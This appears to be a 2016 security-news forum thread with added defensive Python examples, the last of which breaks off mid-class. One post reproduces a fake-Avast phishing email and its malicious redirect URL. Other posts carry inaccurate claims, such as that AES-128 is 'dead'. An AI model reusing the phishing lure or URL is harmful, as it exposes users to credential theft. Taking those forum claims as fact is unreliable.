http://www.pcworld.com/article/3051675/http-compression-continues-to-put-encrypted-communications-at-risk.html
technically any cipher suite lower than 256bit (e.g. 128bit AES or w/o) are on risk (vulnerable aka dead)) get rid of anything RC4, MD5, SHA-1 and obscure etc.
https://www.blackhat.com/docs/asia-16/materials/asia-16-Karakostas-Practical-New-Developments-In-The-BREACH-Attack.pdf
https://raw.github.com/dionyziz/rupture/develop/etc/Black%20Hat%20Asia%202016/asia-16-Practical-New-Developments-In-The-BREACH-Attack-wp.pdf
time to toss away TLS 1.0 and also TLS 1.1 and use only TLS 1.2 (or 1.3 when it comes) !
get rid of weak and weird cipher suites !
and consider deploying the 'SameSite' Set-Cookie header flag https://tools.ietf.org/html/draft-west-first-party-cookies-07#section-3.1
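As an added illustration of the two header-level mitigations named in this post (not code from the post or from any of the linked papers), here is a small Python auditor that reads a captured HTTP response header block and flags cookies missing Secure/HttpOnly/SameSite, plus HTTP compression on a dynamic HTML response that also sets cookies, which is the precondition BREACH needs. The sample headers are constructed for the example.

```python
"""Audit HTTP response headers for SameSite cookie attributes and for
HTTP compression on responses that carry secrets (the BREACH precondition).
Added example; SAMPLE_RESPONSE_HEADERS is constructed, not captured from any site."""
from email.parser import Parser  # parses header blocks incl. repeated Set-Cookie
from typing import Dict, List

# Constructed sample: a compressed dynamic page with one weak session cookie
# and one cookie that carries all the recommended attributes.
SAMPLE_RESPONSE_HEADERS = """\
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Set-Cookie: session=abc123; Path=/; HttpOnly
Set-Cookie: prefs=dark; Path=/; Secure; HttpOnly; SameSite=Strict
Cache-Control: no-store
"""


def parse_headers(raw: str) -> Dict[str, List[str]]:
    """Return header name (lower-cased) -> list of values, preserving repeats."""
    msg = Parser().parsestr(raw, headersonly=True)
    out: Dict[str, List[str]] = {}
    for name, value in msg.items():
        out.setdefault(name.lower(), []).append(value)
    return out


def audit_cookie(set_cookie: str) -> List[str]:
    """Flag missing Secure / HttpOnly / SameSite attributes on one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower(): (p.split("=", 1)[1] if "=" in p else "")
             for p in parts[1:]}
    findings = []
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure")
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly")
    if attrs.get("samesite", "").lower() not in ("strict", "lax"):
        findings.append(f"{name}: SameSite not set to Strict or Lax")
    return findings


def audit_response(raw: str) -> List[str]:
    """Audit every Set-Cookie header and the compression/secret combination."""
    headers = parse_headers(raw)
    findings: List[str] = []
    for sc in headers.get("set-cookie", []):
        findings.extend(audit_cookie(sc))
    # BREACH needs a compressed body, a secret in it and reflected input.
    # Headers only reveal the first two (compression + a cookie-backed
    # session), so flag that combination for manual review of reflected input.
    encoding = " ".join(headers.get("content-encoding", [])).lower()
    ctype = " ".join(headers.get("content-type", [])).lower()
    if any(e in encoding for e in ("gzip", "deflate", "br")) \
            and ctype.startswith("text/html") and headers.get("set-cookie"):
        findings.append("HTTP compression enabled on a dynamic HTML response that "
                        "sets cookies (BREACH precondition; review reflected input)")
    return findings


if __name__ == "__main__":
    for f in audit_response(SAMPLE_RESPONSE_HEADERS):
        print("-", f)
```

Run it against headers saved from `curl -sI` of your own site; a clean result means every cookie carries Secure, HttpOnly and SameSite, and compressed HTML pages get a closer look for reflected input.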
-
Thanks, Dwarden, for the heads-up on this one.
Another development for WordPress: https://en.blog.wordpress.com/2016/04/08/https-everywhere-encryption-for-all-wordpress-com-sites/
I'd rather like to see a secure implementation of https everywhere, and we should really test at https://www.ssllabs.com/ssltest/
The only advantage is admins can log-on somewhat more securely now.
Why does the browser warn on a self-signed certificate and not for third-party Let's Encrypt certificates? Average users cannot distinguish anymore between a real secure non-EV certificate and a Let's Encrypt 'toy' one. And exploit attacks can now be performed over https-only.
Some tips to better protect your log-on credentials.
Admins should have two accounts, one for daily use and one for special tasks.
Members of Admin-groups should have zero permanent users and users with authentication should rotate to perform certain tasks.
Use 2FA to protect against Phishing Attacks that are after your credentials.
Administration should always be performed by users without full admin rights.
With rights there should be the possibility that such rights could be withdrawn,
whenever such a task has been performed.
This is called Just in Time administration.
Applications should be run according to a specific authentication role system.
Administration tasks should only be performed on high-end security machines,
so-called dedicated systems.
A physical environment is always more secure than a virtual one.
There should not be a browser hanging onto such a system, nor should there be
room to set up connections to or receive connections from internet addresses.
But also on the local user level the structures should be secured against exploits
that may also endanger higher levels.
Tips from Roger A. Grimes.
polonus
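To make the "Just in Time administration" idea in the tips above concrete, here is an added Python model (my own example, not any vendor's product or anything from the post) of a tiny elevation broker: the admin group has no permanent members, a dedicated admin account is granted a role for one task with a capped expiry, the grant is withdrawn when the task is done, and a daily-use account can never be elevated. The class and account names (AccessBroker, alice, alice-adm) are hypothetical.

```python
"""Model of just-in-time (JIT) administration: time-bounded role grants,
explicit revocation, no standing membership, separate daily and admin accounts.
Added example; names like AccessBroker and alice-adm are hypothetical."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple


@dataclass
class Grant:
    account: str
    role: str
    reason: str
    expires_at: datetime
    revoked: bool = False


@dataclass
class AccessBroker:
    accounts: Dict[str, str]                      # account -> "daily" | "admin" (constructed directory)
    max_ttl: timedelta = timedelta(hours=1)        # hard cap on how long a task grant may live
    grants: List[Grant] = field(default_factory=list)
    audit: List[Tuple[datetime, str]] = field(default_factory=list)

    def request(self, account: str, role: str, reason: str,
                now: datetime, ttl: Optional[timedelta] = None) -> Grant:
        """Elevate a dedicated admin account into `role` until now + ttl (capped)."""
        if self.accounts.get(account) != "admin":
            # daily-use accounts never receive privileged roles
            raise PermissionError(f"{account} is not a dedicated admin account")
        if not reason.strip():
            raise ValueError("a task reason is required for elevation")
        ttl = min(ttl or self.max_ttl, self.max_ttl)
        g = Grant(account, role, reason, now + ttl)
        self.grants.append(g)
        self.audit.append((now, f"GRANT {role} to {account}: {reason}"))
        return g

    def revoke(self, grant: Grant, now: datetime) -> None:
        """Withdraw the rights as soon as the task has been performed."""
        grant.revoked = True
        self.audit.append((now, f"REVOKE {grant.role} from {grant.account}"))

    def is_authorized(self, account: str, role: str, now: datetime) -> bool:
        """True only while an unexpired, unrevoked grant exists: no standing membership."""
        return any(g.account == account and g.role == role
                   and not g.revoked and now < g.expires_at
                   for g in self.grants)

    def active_members(self, role: str, now: datetime) -> List[str]:
        """Effective members of a role right now; empty whenever nobody is on a task."""
        return sorted({g.account for g in self.grants
                       if g.role == role and not g.revoked and now < g.expires_at})


def demo() -> dict:
    """Walk the policy through one task and return observations for checking."""
    broker = AccessBroker(accounts={"alice": "daily", "alice-adm": "admin"})
    t0 = datetime(2016, 4, 10, 9, 0)
    g = broker.request("alice-adm", "DomainAdmins", "rotate service password", t0,
                       ttl=timedelta(hours=5))          # over the cap -> trimmed to 1 hour
    out = {
        "capped_minutes": int((g.expires_at - t0).total_seconds() // 60),
        "during": broker.is_authorized("alice-adm", "DomainAdmins", t0 + timedelta(minutes=10)),
        "members_during": broker.active_members("DomainAdmins", t0 + timedelta(minutes=10)),
    }
    broker.revoke(g, t0 + timedelta(minutes=20))        # task done, rights withdrawn
    out["after_revoke"] = broker.is_authorized("alice-adm", "DomainAdmins", t0 + timedelta(minutes=25))
    broker.request("alice-adm", "DomainAdmins", "emergency restore", t0 + timedelta(minutes=30))
    out["expired"] = broker.is_authorized("alice-adm", "DomainAdmins", t0 + timedelta(hours=2))
    try:
        broker.request("alice", "DomainAdmins", "shortcut", t0)   # daily account: refused
        out["daily_blocked"] = False
    except PermissionError:
        out["daily_blocked"] = True
    out["audit_entries"] = len(broker.audit)
    return out


if __name__ == "__main__":
    print(demo())
```

The point of the model is the shape of the checks, not the storage: whatever directory or PAM product you use, authorization must be evaluated against a grant with an expiry, every grant and revocation must land in an audit trail, and the daily account must be structurally unable to obtain the role.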
-
Microsoft Security Bulletin Summary for April 2016
https://technet.microsoft.com/en-us/library/security/ms16-apr.aspx
-
Time to uninstall QuickTime for Windows
http://www.ghacks.net/2016/04/15/uninstall-quicktime-for-windows/
-
Trend Micro's blog about QuickTime for Windows
http://blog.trendmicro.com/urgent-call-action-uninstall-quicktime-windows-today/
-
Another Java Flaw (Java sandbox bypass) coming to revisit us after we met it in 2013, read: http://www.security-explorations.com/materials/SE-2012-01-IBM-5.pdf
Researcher Gowdiak writes that IBM's old patch closed off the proof-of-concept attack without considering all possible code paths to the vulnerability: “There were no security checks introduced anywhere in the code. The patch primarily addressed the scenario illustrated by the Proof of Concept code. It didn't take into account all code paths that could be used to reach the vulnerable code sequence”.
pol
-
Why one should always install security updates: http://blog.talosintel.com/2016/04/jboss-backdoor.html
Also read: https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ & http://www.pcworld.com/article/2064580/hackers-actively-exploiting-jboss-vulnerability-to-compromise-servers-researchers-say.html
polonus
-
MIT reveals AI platform which detects 85 percent of cyberattacks
http://www.zdnet.com/article/mit-reveals-ai-platform-which-detects-85-percent-of-cyberattacks/
-
2F Security, turn it on to keep hackers at bay even when they know your password: https://www.turnon2fa.com/
But do not mark your device as trusted on websites that offer 2F protection. It might be more user friendly, but is not good protection-wise.
And when you lose your Android you never know whether it could become unlocked. In the worst scenario services will provide you with a back-up phone number to recover your account. Keep info only you know to claim your account back. Info credits: Lucian Constantin
polonus
P.S. The disadvantage of 2F is that it can be used against you on certain occasions/circumstances, by authorities for instance; in that case there is nothing better than a really good strong old-fashioned password that you will keep to yourself. That is a decision you should make yourself.
D
-
Java Critical Security Update http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
more details in https://forum.avast.com/index.php?topic=9671.10200
-
here we go again
ESET reports new Facebook scam
http://www.arnnet.com.au/article/598266/eset-reports-new-facebook-scam/
here in Norway the file name is said to be V1DE0-[variable number].html
-
here we go again
ESET reports new Facebook scam
http://www.arnnet.com.au/article/598266/eset-reports-new-facebook-scam/
here in Norway the file name is said to be V1DE0-[variable number].html
It's actually an old scam that's been around for quite a while.
1. don't click on links you don't know.
2. never download a player to watch something you didn't really ask for in the first place.
-
Hackers stole $80 million from a central bank because it had $10 routers and no firewall
http://www.businessinsider.com/r-bangladesh-bank-exposed-to-hackers-by-cheap-switches-no-firewall-police-2016-4?IR=T
-
Tech Support Scammers Bring Back FakeAV
https://blog.malwarebytes.org/cybercrime/2016/04/tech-support-scammers-bring-back-fakeav/
-
Apple ID expiry scam tricks users into handing over their passwords and bank details
http://www.independent.co.uk/life-style/gadgets-and-tech/news/apple-id-password-expired-expiry-text-website-scam-phishing-a6991126.html
-
HPSBGN03580 rev.1 - HP Data Protector, Remote Code Execution, Remote Unauthorized Disclosure of Information
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05085988
-
Malcreants way ahead of defenders. Often third party security researchers detect.
Read: http://www.theregister.co.uk/2016/04/26/verizon_breach_report/
polonus
-
Malcreants way ahead of defenders. Often third party security researchers detect.
Read: http://www.theregister.co.uk/2016/04/26/verizon_breach_report/
polonus
That's not really news Damien,
The infection or Malware always comes first. :)
-
Another Day, Another Hack: 7 Million Accounts for Minecraft Community ‘Lifeboat’
http://motherboard.vice.com/read/another-day-another-hack-7-million-emails-and-hashed-passwords-for-minecraft
-
12 million computers backdoored: http://blog.talosintel.com/2016/04/the-wizzards-of-adware.html
pol
-
US govt quietly tweaks rules to let cops, Feds hack computers anywhere, anytime
http://www.theregister.co.uk/2016/04/29/us_government_proposes_rule_41_change/
-
They act like they own every device on earth; well, the Internet backbone is theirs.
US Navy Intel white lodge folks once developed a great service called tor for such occasions,
so use tor on your vpn log-in.
polonus
-
Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html
-
Researchers say there are serious security problems in Samsung’s SmartThings
http://www.theverge.com/2016/5/2/11540246/samsung-smart-things-security-study-critical-flaw-apps
-
Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-April/000069.html
OpenSSL Security Advisory [3rd May 2016]
https://www.openssl.org/news/secadv/20160503.txt
-
Exclusive: Big data breaches found at major email services
http://www.reuters.com/article/us-cyber-passwords-idUSKCN0XV1I6
HOLD SECURITY RECOVERS 272 MILLION STOLEN CREDENTIALS FROM A COLLECTOR
http://holdsecurity.com/news/the_collector_breach/
-
Microsoft - Changes to Security Update Links
https://blogs.technet.microsoft.com/msrc/2016/04/29/changes-to-security-update-links/
-
Microsoft - Changes to Security Update Links
https://blogs.technet.microsoft.com/msrc/2016/04/29/changes-to-security-update-links/
Some additional information:
(http://screencast-o-matic.com/screenshots/u/Lh/1462449666881-83008.png)
-
5 year old Android hole: https://www.fireeye.com/blog/threat-research/2016/05/exploiting_cve-2016-.html
polonus
-
10,000s of sites risk being hacked due to security problems in ImageMagick
https://imagetragick.com/
-
VirusTotal: Maintaining a healthy community
http://blog.virustotal.com/2016/05/maintaining-healthy-community.html
http://www.reuters.com/article/us-cybersecurity-sharing-virustotal-anal-idUSKCN0XY0R4
-
The broader the spectrum the less chance for "conservative protective measures" and other power arming measures.
Hope those that were dropped will find their way here: http://support.clean-mx.de/clean-mx/login.php
VT should not think they have the final word where malware detection is concerned.
Do not underestimate the Google influence here as well. Why are Avast Mobile apps, Google Mobile apps and the AdBlockPlus app always targeted by adware app detection? Because of the AdMob insecurity built in that enables Google ad tracking. When those solutions that were dropped do however alert on AdMob = Google Adware Mobile Tracking, they could threaten "vested interests", certain agreements made by larger companies to partner with Google. They will never admit to it, but I wonder whether that did not come into play here in the background...
polonus
-
Microsoft Security Bulletin Summary for May 2016
https://technet.microsoft.com/library/security/ms16-may
-
ASUS - After installing Microsoft Update KB3133977 for Windows 7, some users may encounter a "Secure Boot Violation" , which makes the system fail to boot into the operating system
https://www.asus.com/support/FAQ/1016356/
-
ASUS - After installing Microsoft Update KB3133977 for Windows 7, some users may encounter a "Secure Boot Violation" , which makes the system fail to boot into the operating system
https://www.asus.com/support/FAQ/1016356/
I think we need to get used to this with Win10 and its Auto Updates, acting as KB beta testers for business users Win10 Pro, etc.
-
Alert (TA16-132A) - Exploitation of SAP Business Applications
https://www.us-cert.gov/ncas/alerts/TA16-132A
https://www.onapsis.com/threat-report-tip-iceberg-wild-exploitation-cyber-attacks-sap-business-applications
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
-
Americans worried about Internet Privacy: https://www.ntia.doc.gov/blog/2016/lack-trust-internet-privacy-and-security-may-deter-economic-and-other-online-activities
Do not put out there what you wanna keep to yourself.
polonus
-
http://news.softpedia.com/news/ss7-attack-leaves-whatsapp-and-telegram-encryption-useless-503894.shtml
that's what happens when the mobile world uses a 40-year-old standard as base layer
-
Seems to be a new trick / scam.
Fake product key popup
https://forums.malwarebytes.org/topic/183142-product-key-malware/
The phone number listed on the popup has been used in many previous scams > Google search
https://www.google.no/search?num=50&newwindow=1&site=&source=hp&q=8444598882&oq=8444598882&gs_l=hp.3...1664.34389.0.40370.10.10.0.0.0.0.53.424.10.10.0....0...1c.1.64.hp..0.5.227...0j0i131j0i30j0i5i30.OCT1GE3olo8&gws_rd=cr&ei=F7w5V7PdNcyLsAHFwae4Dg#newwindow=1&q=1-844-459-8882
-
GoDaddy closed an XSS hole on their account customer support: http://www.theregister.co.uk/2016/05/10/godaddy_plugs_account_hijack_xss_vulnerability/
customer accounts could have been totally compromised through the XSS payload...
pol
-
Comics: cybercriminals meeting in the flesh sometimes:
https://threatpost.com/cyber-criminal-underground-comics-edition-102210/74587/
pol
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
OK, seeing as Avast! uses a 7zip module, (1) is this being addressed in an upgrade, or (2) can we simply replace the dll/module?
I have already upgraded my PeaZip, but...
Gordon.
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
OK, seeing as Avast! uses a 7zip module, (1) is this being addressed in an upgrade, or (2) can we simply replace the dll/module?
I have already upgraded my PeaZip, but...
Gordon.
Please note,
"The security vulnerability has been fixed in 7-Zip 16.0 which has been released this month."
-
7-Zip vulnerability affects security software
http://www.ghacks.net/2016/05/13/7zip-vulnerability-affects-security-software/
OK, seeing as Avast! uses a 7zip module, (1) is this being addressed in an upgrade, or (2) can we simply replace the dll/module?
<snip>
What makes you think that avast uses 7zip ?
As far as I'm aware it doesn't install it, it only reports 7zip in the Software Updater if you have it installed.
-
What makes you think that avast uses 7zip ?
This:
(https://www.dropbox.com/s/ah63ah4il50zwsv/AboutAvast.png?dl=1)
@bob3160 - ""The security vulnerability has been fixed in 7-Zip 16.0 which has been released this month." - Ah yes, but has Avast installed the upgrade?
Gordon.
-
Avast staff will have to answer this question, regarding whether 7-zip libraries have been updated in Avast.
-
What makes you think that avast uses 7zip ?
This:
(https://www.dropbox.com/s/ah63ah4il50zwsv/AboutAvast.png?dl=1)
@bob3160 - ""The security vulnerability has been fixed in 7-Zip 16.0 which has been released this month." - Ah yes, but has Avast installed the upgrade?
Gordon.
OK, now it's clear, but only when I viewed the code of your post, as the image isn't being displayed: the URL tag doesn't fetch the image, nor is it displaying the code. It's only seen if you look at the underlying code, which I couldn't see; you would have to have downloaded it (if you could actually see the URL).
[img]https://www.dropbox.com/s/ah63ah4il50zwsv/AboutAvast.png?dl=1[/img]
It didn't need a quote of bob3160's post, you could have attached an image of your about.avast screen (which I have just done).
-
I am using older version of MBAM (1.75) and I replaced 7z.dll in MBAM Program Files folder with 7z.dll from
7-Zip 16.0 Portable and everything is working fine.
I am not sure, but I think Avast uses 7-Zip only in installer.
-
I am using older version of MBAM (1.75) and I replaced 7z.dll in MBAM Program Files folder with 7z.dll from
7-Zip 16.0 Portable and everything is working fine.
I am not sure, but I think Avast uses 7-Zip only in installer.
Whilst there is nothing definitive on what avast uses 7zip for, it wouldn't be unreasonable to think it could be used for unpacking files that are going to be scanned.
-
Avast will need to update the library, just like any other sane security software did ...
-
Microsoft releases unofficial service pack for Windows 7
http://www.extremetech.com/computing/228779-microsoft-releases-unofficial-service-pack-for-windows-7
-
Avast will need to update the library, just like any other sane security software did ...
Avast isn't vulnerable. This should answer your question:
https://blog.avast.com/avast-software-updater-can-help-protect-you-from-security-loopholes-like-the-recent-7-zip-vulnerabilities
-
Most WordPress sites hacked through three vulnerable (outdated) plug-ins: the RevSlider and GravityForms plug-ins and the TimThumb script. A quarter of all hacked WordPress sites had a vulnerable version of just these scripts. When pages are being hacked through outdated software, attackers will place a PHP backdoor (66%). Why do webmasters not update and patch? :o
Read about it here: https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf
polonus
-
FBI asks technology firms like Google etc. not to offer end2end encryption by default (standard),
but only when users opt in. Google did so with Google Allo: only incognito mode comes with stronger encryption.
Compliance with FBI demands is better than later having to look for an excuse when backdoors in your software are detected.
That is not making your software look too good, is it? Having no explanations to make is always better.
Read: https://twitter.com/csoghoian/status/733088078311489540
So encryption will not come by default, turning the technologically unaware user into a potential FBI surveillance victim.
When we wanna protect ourselves we again have to fend for ourselves.
polonus
-
Avast will need to update the library, just like any other sane security software did ...
Avast isn't vulnerable. This should answer your question:
https://blog.avast.com/avast-software-updater-can-help-protect-you-from-security-loopholes-like-the-recent-7-zip-vulnerabilities
so if I toss a specially crafted file with those exploits masked as 7zip format at avast, it shall not break ...
{crunch crunch}
-
Magento 2.0.6 Security Update
https://magento.com/security/patches/magento-206-security-update
-
Avast will need to update the library, just like any other sane security software did ...
Avast isn't vulnerable. This should answer your question:
https://blog.avast.com/avast-software-updater-can-help-protect-you-from-security-loopholes-like-the-recent-7-zip-vulnerabilities
so if I toss a specially crafted file with those exploits masked as 7zip format at avast, it shall not break ...
{crunch crunch}
Actually it probably will try. First and most important: Avast is not compromised. However, if Avast opens a v15 7z archive which contains a crafted file, then if the file contains the arbitrary code which the attacker wants executed, then that code will be executed as the result of the UDF vulnerability. And you should then see (if the code has a sig or does things Avast doesn't like) Avast swing into action and throw the file in the Chest. I doubt that Avast would be damaged, but OTOH, if the attacker is very very clever and is aiming at Avast...?
The important question here is "Has Avast updated its engine to replace any v15 7-Zip with v16 7-Zip? And if not, when?"
Gordon.
-
Did you read the blog post provided by Bob..!?
Avast is not affected by these vulnerabilities, but if you are a non-Avast user we recommend you update your antivirus software, if you haven’t done so already.
-
Did you read the blog post provided by Bob..!?
Avast is not affected by these vulnerabilities, but if you are a non-Avast user we recommend you update your antivirus software, if you haven’t done so already.
Reading is important, Comprehension is paramount. :)
-
LinkedIn - Protecting Our Members
https://blog.linkedin.com/2016/05/18/protecting-our-members
-
Being quite thin-skinned, I assume youse are talking to me... 8)
Did you read the blog post provided by Bob..!?
Avast is not affected by these vulnerabilities, ...
Reading is important, Comprehension is paramount. :)
Ummm... What part of
First and most important: Avast is not compromised.
was not understood?
I repeat my important question:
The important question here is "Has Avast updated its engine to replace any v15 7-Zip with v16 7-Zip? And if not, when?"
That's all.
Gordon.
-
I'd suggest to start a new topic, if further discussion is needed.
-
Censorship of our online views slowly brought in, read:
http://www.independent.co.uk/voices/facebook-is-censoring-our-views-and-this-is-feeding-extremism-a7029251.html
Also: https://www.facebook.com/notes/people-over-politics/popaction-alert-facebook-censorship-is-on-the-rise-take-action-now/519387508074020/
polonus
-
TYPO3-CORE-SA-2016-013: Missing Access Check in TYPO3 CMS
https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2016-013/
-
Error with CryptXXX-decryptor tool, get working tool here: https://www.dropbox.com/s/blaw1yn295s5a9a/New_DeCrypt.rar?dl=0
polonus
-
Mitigate the Blue Coat Symantec intermediate certificate abuse scandal; read: Untrusting the intermediate CA: https://blog.filippo.io/untrusting-an-intermediate-ca-on-os-x/
polonus
-
6,7% of the most popular websites try to block users with adblockers; read this report: https://www.lightbluetouchpaper.org/2016/05/28/adblocking-and-counter-blocking-a-slice-of-the-arms-race/
The underlying problems however have never been tackled as to question why users use adblockers in the first place.
For me the moment to not block ads would arrive once there was a guarantee from a particular adblocking website that it was 100% malvertiser free. But no one at this moment can guarantee there would be no more malads on pages that block adblockers. Whenever there was a guarantee that ad launchers would discriminate between a fraudulent and an honest adware buck, I would allow their honest upright ad. As this situation still seems a long, long time off, if it will ever arrive, I keep my adblock visors up and even have some special third party lists installed (JoeWein, feodotracker etc.).
polonus
-
Possibly some others have come across this already even though this is apparently 'New'
http://www.msn.com/en-us/money/technology/this-serpent-like-malware-lies-dormant-until-you-access-your-bank-account/ar-BBtyEST?li=BBnbfcL&ocid=HPCDHP
-
Thanks goes out to our forum friend, schmidthouse, for posting the link.
This thread is one I always come back to visit and when I read something that I think will help our community members with better securing their bits and bytes, I do not hesitate to post. Again thanks to Avast to provide us with this great knowledge forum.
Avast has built me up over a decade into the volunteer website analysis security guy and website error-hunter I am today.
Now the heads-up on these outdated, vulnerable WordPress plug-ins, always a risk, but especially ones like old Ninja Forms and others like it; read:
https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
polonus
-
Security Advisory: Stored XSS in Jetpack
https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
-
Just received an e-mail with a possible ransom dropper attached. Avast does not detect it but I have sent a copy to Maxx
VT scan https://www.virustotal.com/en/file/4c84eeab806646862e79fbf6f610d6c46ac11a68e0cb7e11d8aa9434c7579503/analysis/1464701568/
-
Statistics gathered by US cyber-security firm Fortinet reveal that, between April 1, 2016, and May 15, 2016, the top five most prevalent ransomware families were in this order: CryptoWall (41.04%), Locky (34.36%), Cerber (24.17%), TorrentLocker (0.24%), and TeslaCrypt (0.09%).
-
rumor about some TeamViewer security issues
https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/
-
Extortion E-mail Schemes Tied to Recent High-Profile Data Breaches
http://www.ic3.gov/media/2016/160601.aspx
-
WP Mobile Detector Vulnerability being abused in the wild:
https://blog.sucuri.net/2016/06/wp-mobile-detector-vulnerability-being-exploited-in-the-wild.html
Around 2000 sites run this plug-in.
polonus
-
rumor about some TeamViewer security issues
https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/
This may help:
http://www.howtogeek.com/257376/how-to-lock-down-teamviewer-for-more-secure-remote-access/
-
Obsolete WordPress and Drupal - hacks may have been possible thanks to such CMS vuln:
http://www.theregister.co.uk/2016/06/01/cms_vulns_rife_in_top_uk_companies_wordpress_drupal/
link article author = John Leyden.
pol
-
The impact of misconfigured NFS-servers is terabytes and terabytes of data-leakage:
https://blog.fortinet.com/2016/05/30/misconfigured-nfs-servers-put-thousands-of-terabytes-of-data-at-risk
3400 vulnerable servers just in the Netherlands.
Everyone can install an application out of the box,
but not everyone can configure according to best practices,
safely and securely. :o
polonus
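Since the post above turns on configuration rather than on any software bug, here is an added Python checker (my own example, not from the Fortinet article) that audits an NFS /etc/exports file for the settings that turn a file server into a public data leak: exports open to every host, read-write world exports, the "/dir (rw)" space mistake that exports to the world, no_root_squash and insecure. The exports content is constructed for the example.

```python
"""Audit an NFS /etc/exports file for world-open and root-trusting exports.
Added example; SAMPLE_EXPORTS is constructed and not taken from any real host."""
from typing import List, Tuple

# Constructed sample /etc/exports covering the common mistakes
SAMPLE_EXPORTS = """\
# backups for the office
/srv/backup   192.168.10.0/24(rw,sync,root_squash)
/srv/public   *(ro,sync)
/srv/data     *(rw,no_root_squash,insecure)
/home         10.0.0.0/8(rw,sync) *.example.com(rw,no_subtree_check)
/srv/mistake  (rw)
"""


def parse_exports(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, client, options) for every export/client pair in the file."""
    entries: List[Tuple[str, str, List[str]]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        tokens = line.split()
        path, specs = tokens[0], tokens[1:]
        for tok in specs:
            if "(" in tok:
                host, _, rest = tok.partition("(")
                opts = [o.strip().lower() for o in rest.rstrip(")").split(",") if o.strip()]
            else:
                host, opts = tok, []             # host with default options (ro, root_squash, secure)
            # "/dir (rw)" with a space before the parenthesis has an empty host
            # field, which exports the directory to every client.
            entries.append((path, host or "*", opts))
    return entries


def audit_exports(text: str) -> List[str]:
    """Flag the export settings that lead to unauthenticated data exposure."""
    findings: List[str] = []
    for path, client, opts in parse_exports(text):
        world = client in ("*", "0.0.0.0/0")
        if world and "rw" in opts:
            findings.append(f"{path}: exported read-write to the whole world ({client})")
        elif world:
            findings.append(f"{path}: exported read-only to the whole world ({client})")
        if "no_root_squash" in opts:
            findings.append(f"{path} -> {client}: no_root_squash (remote root becomes local root)")
        if "insecure" in opts:
            findings.append(f"{path} -> {client}: insecure (unprivileged source ports allowed)")
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print("-", f)
```

Run it as `python3 nfs_audit.py` after pasting your own exports into the string, or wire `audit_exports(open("/etc/exports").read())` into a config-check job; an empty list means every export names a specific client range and keeps the default root_squash and secure behaviour. It does not replace a firewall in front of port 2049, which the article also calls for.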
-
rumor about some TeamViewer security issues
https://www.reddit.com/r/technology/comments/4m7ay6/teamviewer_has_been_hacked_they_are_denying/
TeamViewer denies hack after PCs hijacked, PayPal accounts drained
http://www.theregister.co.uk/2016/06/01/teamviewer_mass_breach_report/
-
TECH SUPPORT SCAM
http://www.ic3.gov/media/2016/160602.aspx
-
TECH SUPPORT SCAM
http://www.ic3.gov/media/2016/160602.aspx
http://prntscr.com/bc9pzn
^^Updates necessary.
-
A friend received a mail supposedly from avast, but it's fake because the link sends you to another site and claims to scan mail.
The mail shows the link to go to as http://scan.avast.com/email?id=hugoc@vcing.com.ar
but in reality this fake link directs to http://zonefitness.com.ng/snookie/crypted/index.php?email=hugoc@vcing.com.ar
Good morning Carlos!
What could this be?
Hugo
From: Avast.com [mailto:security@avast.com]
Sent: Monday, June 6, 2016 10:19 a.m.
To: hugocorti@valcan-ingenieria.com.ar
Subject: Your mailbox is infected with deadly virus. Run email scan now!
Avast Internet Security
Dear hugoc@vcing.com.ar,
Our spider detected 5 deadly trojans in your mailbox today.
If left unchecked, this can lead to a total email shutdown or loss of important data.
To protect your email data, follow the URL below to scan your E-mail for free.
http://scan.avast.com/email?id=hugoc@vcing.com.ar
*Note: This will serve as a final notification to this threat.
Source: Avast Internet Security
Safe Mail: This email has been checked for viruses by Avast antivirus software.
Virus-free. www.avast.com
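The trick in the mail above is that the visible link text shows scan.avast.com while the href goes elsewhere. As an added example (my own code, not anything from the post or from a mail gateway), this Python script pulls every anchor out of an HTML mail body with the standard-library HTMLParser and reports the ones whose displayed hostname does not match the hostname the href really points at. The HTML fragment is constructed for the example, reusing the two hostnames quoted in the post; the last-two-labels domain comparison is a deliberate simplification.

```python
"""Detect anchors whose visible URL text names a different host than the href.
Added example; SAMPLE_MAIL_HTML is constructed around the hostnames quoted in
the post, and registrable_part() is a crude stand-in for a public-suffix lookup."""
import re
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urlparse

SAMPLE_MAIL_HTML = """\
<p>To protect your email data, follow the URL below to scan your E-mail for free.</p>
<p><a href="http://zonefitness.com.ng/snookie/crypted/index.php?email=hugoc@vcing.com.ar">http://scan.avast.com/email?id=hugoc@vcing.com.ar</a></p>
<p><a href="https://www.avast.com/">www.avast.com</a> &middot; <a href="https://support.avast.com/">Help</a></p>
"""

# A hostname-looking token inside the visible anchor text, scheme optional.
URL_IN_TEXT = re.compile(r"(?:https?://)?((?:[\w-]+\.)+[a-z]{2,})", re.I)


class AnchorCollector(HTMLParser):
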